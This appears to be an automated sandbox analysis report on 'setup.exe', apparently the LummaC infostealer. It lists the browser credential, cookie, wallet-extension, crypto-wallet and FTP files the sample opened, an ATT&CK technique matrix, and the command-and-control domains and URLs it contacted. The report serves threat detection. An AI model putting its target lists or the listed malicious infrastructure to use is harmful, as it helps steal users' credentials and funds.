              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		221
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager221
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              setup.exe16%ReversingLabsWin32.Infostealer.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://fairiespar.cyou/api0%Avira URL Cloudsafe
              https://klipvumisui.shop/c&100%Avira URL Cloudmalware
              https://fairiespar.cyou:443/api0%Avira URL Cloudsafe
              https://fairiespar.cyou:443/apiocal0%Avira URL Cloudsafe
              https://fairiespar.cyou/:z0%Avira URL Cloudsafe
              https://klipvumisui.shop:443/int_clp_sha.txtg0lh100%Avira URL Cloudmalware
              https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
              Http://Www.SkyGz.Com0%Avira URL Cloudsafe
              https://fairiespar.cyou/Cert0%Avira URL Cloudsafe
              https://fairiespar.cyou/hortp0%Avira URL Cloudsafe
              https://fairiespar.cyou/XBWQPea0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txt?100%Avira URL Cloudmalware
              https://fairiespar.cyou/0%Avira URL Cloudsafe
              https://fairiespar.cyou/pi0%Avira URL Cloudsafe
              https://fairiespar.cyou/let_0%Avira URL Cloudsafe
              fairiespar.cyou0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtIe100%Avira URL Cloudmalware
              https://fairiespar.cyou/apiers0%Avira URL Cloudsafe
              https://fairiespar.cyou:443/apiws0%Avira URL Cloudsafe
              https://fairiespar.cyou/w0%Avira URL Cloudsafe
              https://klipvumisui.shop/)100%Avira URL Cloudmalware
              https://fairiespar.cyou/u0%Avira URL Cloudsafe
              https://dfgh.online/invoker.php?compName=hZ100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                fairiespar.cyou
                		188.114.97.3
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://fairiespar.cyou/apitrue
                    • Avira URL Cloud: safe
                    		unknown
                    rabidcowse.shopfalse
                      		high
                      wholersorie.shopfalse
                        		high
                        cloudewahsj.shopfalse
                          		high
                          noisycuttej.shopfalse
                            		high
                            nearycrepso.shopfalse
                              		high
                              https://cegu.shop/8574262446/ph.txtfalse
                                		high
                                fairiespar.cyoutrue
                                • Avira URL Cloud: safe
                                		unknown
                                framekgirus.shopfalse
                                  		high
                                  tirepublicerj.shopfalse
                                    		high
                                    abruptyopsn.shopfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://cegu.shop:443/8574262446/ph.txtsetup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabsetup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://fairiespar.cyou:443/apisetup.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://klipvumisui.shop:443/int_clp_sha.txtsetup.exefalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://klipvumisui.shop:443/int_clp_sha.txtg0lhsetup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://klipvumisui.shop/c&setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://cegu.shop/setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://dfgh.online/invoker.php?compName=powershell.exe, 0000000A.00000002.1515220136.0000000005380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.starfieldtech.com/0Dsetup.exefalse
                                                    		high
                                                    https://fairiespar.cyou/Certsetup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
